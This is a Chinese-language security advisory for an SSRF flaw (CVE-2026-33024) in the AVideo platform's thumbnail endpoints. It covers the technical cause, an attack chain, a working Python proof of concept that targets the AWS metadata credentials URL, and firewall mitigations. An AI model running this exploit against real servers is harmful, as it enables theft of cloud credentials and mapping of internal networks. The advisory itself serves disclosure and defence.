CVE-2026-33024 AVideo服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-33024

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AVideo

漏洞概述

AVideo视频平台8.0之前的版本存在严重的服务器端请求伪造（SSRF）漏洞。该漏洞影响公共缩略图生成端点`getImage.php`和`getImageMP4.php`。由于缺乏身份验证且URL验证机制不完善，未经身份认证的攻击者可诱导服务器向内部网络资源发起请求。这使得攻击者能够探测内网服务，甚至窃取云服务实例的元数据敏感信息，构成极高的安全风险。

技术细节

该漏洞的核心在于AVideo平台`getImage.php`和`getImageMP4.php`端点对用户输入的处理逻辑存在缺陷。这两个接口接受一个名为`base64Url`的GET参数，服务端对其进行Base64解码后，未经充分的安全检查便直接将其作为输入源传递给`ffmpeg`程序处理。原有的验证机制仅使用了PHP的`FILTER_VALIDATE_URL`函数，确保URL语法正确且以`http://`或`https://`开头。这种验证方式极为薄弱，无法防御针对内网资源的攻击。攻击者可精心构造指向`http://169.254.169.254/latest/meta-data/`（AWS云平台元数据服务）或`http://192.168.x.x`等内网地址的URL。由于`ffmpeg`会尝试访问这些URL，攻击者虽然无法直接获取HTTP响应内容（即盲SSRF），但可以通过测量服务端响应时间的差异（如请求内网不存在端口时的超时）或分析服务端错误日志来推断内网拓扑结构或窃取敏感的云凭证信息。

攻击链分析

STEP 1

侦察

攻击者识别出目标站点运行的是AVideo平台，且版本低于8.0。

STEP 2

载荷构造

攻击者构造一个指向内网敏感资源（如AWS元数据服务）的URL，并将其进行Base64编码。

STEP 3

漏洞利用

攻击者向`getImage.php`或`getImageMP4.php`端点发送包含恶意`base64Url`参数的GET请求，无需任何身份验证。

STEP 4

服务端请求

服务器端解码URL并调用`ffmpeg`处理该地址，导致服务器向内网地址发起HTTP连接。

STEP 5

信息泄露

攻击者通过分析响应时间差异（盲注）或查看服务器错误日志，确认内网资源是否存在并获取相关信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import base64

def exploit_ssrf(target_url, internal_url):
    """
    Exploit CVE-2026-33024 SSRF in AVideo
    """
    # Endpoint vulnerable to SSRF
    endpoint = "/getImage.php"
    
    # The vulnerable parameter expects a base64 encoded URL
    # Using base64url encoding (replacing + and / with - and _)
    b64_encoded = base64.urlsafe_b64encode(internal_url.encode()).decode().rstrip('=')
    
    # Construct payload
    params = {
        "base64Url": b64_encoded
    }
    
    try:
        print(f"[+] Sending request to {target_url}{endpoint} with payload for {internal_url}")
        response = requests.get(target_url + endpoint, params=params, timeout=10)
        
        # Since it is a blind SSRF, we check status code and timing
        print(f"[+] Response Status Code: {response.status_code}")
        print(f"[+] Response Time: {response.elapsed.total_seconds()} seconds")
        
        # Analysis hint: Check if response time indicates a connection attempt to internal resource
        if response.elapsed.total_seconds() > 5:
            print("[!] Potential timeout detected, possible SSRF trigger.")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    # Example targeting AWS Metadata Service (common SSRF target)
    target = "http://localhost:80" # Replace with actual AVideo host
    internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    
    exploit_ssrf(target, internal_target)

影响范围

AVideo < 8.0

防御指南

临时缓解措施

建议立即升级至安全版本。若无法立即升级，应在网络防火墙或安全组层面限制服务器对外发起的HTTP/HTTPS请求，特别是阻断对RFC1918定义的内网IP段（如10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16）以及链路本地地址（169.254.169.254）的访问。